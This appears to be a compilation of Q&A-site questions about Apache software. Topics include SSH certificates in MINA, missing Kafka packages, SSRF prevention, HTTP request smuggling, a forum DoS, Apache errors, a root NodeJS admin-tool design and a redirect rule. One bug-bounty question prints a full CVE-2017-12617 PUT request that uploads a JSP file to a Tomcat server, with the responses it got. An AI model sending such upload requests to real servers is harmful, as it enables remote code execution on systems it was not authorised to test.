Force Apache Server/Tomcat to ignore Transfer-Encoding

I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end.

Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible with this configuration?

Using apache mina for ssh using signed ssh-rsa-cert-01 from Certification Authority

There is an existing client configured and running (SshClient) using Apache MINA to SSH to one of our internal jump boxes. It currently uses PEM-based authentication. Due to compliance we have to switch to using internally signed certificates (internally we are using HashiCorp Vault as a CA). I’m unable to find any documentation regarding how to use signed certificates for SSH in Apache MINA to start with. Is it not supported? Will I perhaps have to use another Java SSH library?

Kafka source code on github and from the apache website is missing the “org.apache.kafka.common.message.” package? [closed]

I tried downloading the source code of Kafka from GitHub as well as from Apache’s website. I found that both sources were missing the “org.apache.kafka.common.message.” package. Can anybody kindly let me know why this might be the case?

Kindly note that I downloaded the source of “AK RELEASE 2.5.0” from Apache’s website. Similarly, I used the “trunk” branch from the current GitHub repository for Kafka.

What measures can I take to prevent Server Side Request Forgery (SSRF) in a JAX-RS Application running on Apache Tomcat?

If I have an application server that uses an implementation of JAX-RS and is running as a *.war file on an Apache Tomcat server, is there anything special that needs to be done or configured to prevent SSRF attacks?

My naive understanding is that JAX-RS applications only serve requests to certain URLs and Apache Tomcat only allows requests to certain resources.

If this is handled by default by JAX-RS or Apache Tomcat, could you explain how?

If this is not handled by default by JAX-RS nor Apache Tomcat, could you explain the best way to prevent this type of attack with these tools?

Specific versions:

  • JAX-RS api 2.1
  • Apache Tomcat 9.0.33

Vulnerable Apache Tomcat server

I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Speaking of Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.

Any Apache Tomcat server with the PUT request method enabled will allow the attacker to create a JSP file on the server through a crafted request, which leads to RCE:

    PUT /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://vulnerable.com/public/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
    Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
    Connection: close
    Content-Length: 26

    <% out.println("hello");%>

And after some testing, I found that the server had the PUT method enabled. But when I sent the exploit request, there was an error:

    PUT /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    <% out.println("hello");%>

    HTTP/1.1 500 Internal Server Error
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Content-Length: 389
    Date: Fri, 17 Apr 2020 02:07:24 GMT
    Connection: close

    <html><body><h1>Whitelabel Error Page</h1>
    <p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p>
    <div id='created'>Fri Apr 17 11:07:24 JST 2020</div>
    <div>There was an unexpected error (type=Internal Server Error, status=500).</div>
    <div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot; o&quot;</div>
    </body></html>

I found that the error is from the Java URLDecoder. The server may have decoded the content in the body of the request, but "% o" is not a valid URL escape, so the error turns up. It proves that the server has handled the request; it may work, but it does not. Then I tried this:

    PUT /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    <%25 out.println("hello");%25>

    HTTP/1.1 404 Not Found
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Date: Fri, 17 Apr 2020 02:05:30 GMT
    Connection: close
    Content-Length: 1295

    <!DOCTYPE html>
    <!--
      ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
      ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
      -->
    <html>
    <head>
      <title>VULNEARBLE</title>
    ...

It gave me back a 404 response. I have tried POST, but it just proves that there is something special about the PUT method:

    POST /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    <% out.println("hello");%>

    HTTP/1.1 404 Not Found
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Date: Fri, 17 Apr 2020 02:05:30 GMT
    Connection: close
    Content-Length: 1295

    <!DOCTYPE html>
    <!--
      ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
      ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
      -->
    <html>
    <head>
      <title>VULNEARBLE</title>
    ...

(The POST request does not even show any error or response.) I have checked for the 1.jsp file, but it hasn’t been created yet:

    GET /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    HTTP/1.1 404 Not Found
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Date: Fri, 17 Apr 2020 02:05:30 GMT
    Connection: close
    Content-Length: 1295

    <!DOCTYPE html>
    <!--
      ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
      ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
      -->
    <html>
    <head>
      <title>VULNEARBLE</title>
    ...

Does anyone know what is happening and what I should do next?

apache server under attack

Hi all,
I run a small community. I am using the Apache web server with SMF forums on a VPS with CentOS 7. I have good firewalls going (CSF). I am trying to solve an issue with a user crashing my forums. The memory and CPU on the VPS will spike to 100% and create a "cannot connect to mysql database" error. In the Apache error logs I get a mpm_prefork error showing AH00159, out of memory. Can anyone tell me how to prevent this attack? Thanks.

Apache site down after getting AH02032 error

Apache site goes down after getting an AH02032 error, and automatically comes back up if I restart Apache or after some time (maybe 1-3 hours). The server setup is XAMPP on Windows Server 2012. Many sites are hosted on the same server with a virtual host setup; all domains except the one with the error are working without any problem.

Error Log:

    [Tue Mar 10 19:17:00.320296 2020] [:error] [pid 6776:tid 1824] [client 5.101.0.209:55464] script 'C:/xampp/htdocs/WEBSITES/************/index.php' not found or unable to stat
    [Wed Mar 11 05:53:30.164225 2020] [ssl:error] [pid 6776:tid 1812] AH02032: Hostname 13.127.**.** provided via SNI and hostname btcoworld.com provided via HTTP are different

Access Log:

Maybe an unknown connection:

    209.17.96.74 - - [11/Mar/2020:05:47:56 +0000] "GET / HTTP/1.1" 200 49594 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http:// cloudsystemnetworks.com)"
    54.190.178.146 - - [11/Mar/2020:05:52:25 +0000] "GET / HTTP/1.1" 200 49594 "-" "Go-http-client/1.1"
    212.92.115.37 - - [11/Mar/2020:05:53:30 +0000] "GET https:// btcoworld.com/ HTTP/1.1" 400 1015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"
    157.55.39.31 - - [11/Mar/2020:05:55:47 +0000] "GET /robots.txt HTTP/1.1" 404 26 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http:// www.bing.com/bingbot.htm)"
    207.46.13.155 - - [11/Mar/2020:05:55:53 +0000] "GET /dashboard/de/faq.html HTTP/1.1" 404 26 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http:// www.bing.com/bingbot.htm)"

So my question is: how should I prevent the site from going down, and prevent these errors/attacks? Thanks

Rate my idea: NodeJS as root behind Apache as a proxy with password

I’m the admin of a small Linux server owned by a relative of mine. He’s fairly tech savvy, but more at the level of a power user than an expert. I want to make a handy visual tool for him that would allow him to do some simple server tasks: add/remove users and change their passwords; set up/remove websites; set up/remove mailboxes (I’ve decoupled those from system users, so it’s a separate task if needed); and perhaps something else as needed.

Most of these things can be done from the command line and some require editing config files, but lengthy incantations with a lot of moving parts are just asking for trouble. I’d rather have a handy script.

The trouble is: most of these tasks require superuser permissions. He already has that, so I could make a text-mode tool (which would need to be run as root), but a website would be so much nicer.

There’s already an Apache web server in place on port 80, but running that as root would obviously be a lousy idea. Similarly, I don’t want to store the root password anywhere.

So I had the idea of making the website in NodeJS and running the Node process as root, listening only on a specific port which only accepts incoming connections from localhost. Then Apache would be a non-elevated proxy in front of the NodeJS app. In addition, both Apache and NodeJS would ask for a password (taken from the same .htpasswd file).

If you can’t enter the password for Apache, you can’t even get to Node. If you hack Apache (or have access to some local account), you still need the password to get the Node app to cooperate.

Would this be safe enough? OK, that’s kind of subjective, but considering that I’m more worried about opportunistic hackers from outside than malicious local users, would this be OK? There’s really nothing of much value stored on the server; I don’t expect anyone to do targeted hacking because there’s not much to gain (Wanna see pictures of my kids? You’re welcome…). I consider automated scanners and hackers trying to add to their botnets/DB leaks the main threat. Any other suggestions on how to achieve this?

Apache, Redirect is not working for substring

Issue

In Apache, how can I redirect to the homepage if someone goes to an exact string, while everything beyond this string is displayed normally, with no redirect?

Example.

    http://example.com/STRING -> go to homepage
    http://example.com/STRING_PAGE -> go to http://example.com/STRING_PAGE

I tried

Redirect 301 /STRING http://example.com/ 

But in this case the page is redirected to the homepage too, for example in the case of http://example.com/STRING_PAGE.

Thanks.
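An added configuration example, not part of the question: the prefix form the question used next to an anchored RedirectMatch that leaves /STRING_PAGE alone. It assumes mod_alias is loaded and that the directive lives in the site's virtual host or .htaccess.

```apache
# Prefix form from the question (kept commented out, since it would fire
# first): Redirect matches any URL-path that *begins* with /STRING,
# so /STRING_PAGE is redirected as well.
# Redirect 301 /STRING http://example.com/

# Exact form: RedirectMatch takes a regular expression, so anchoring it
# with ^ and $ matches only /STRING (and /STRING/ with the optional
# trailing slash). /STRING_PAGE no longer matches and is served normally.
RedirectMatch 301 ^/STRING/?$ http://example.com/
```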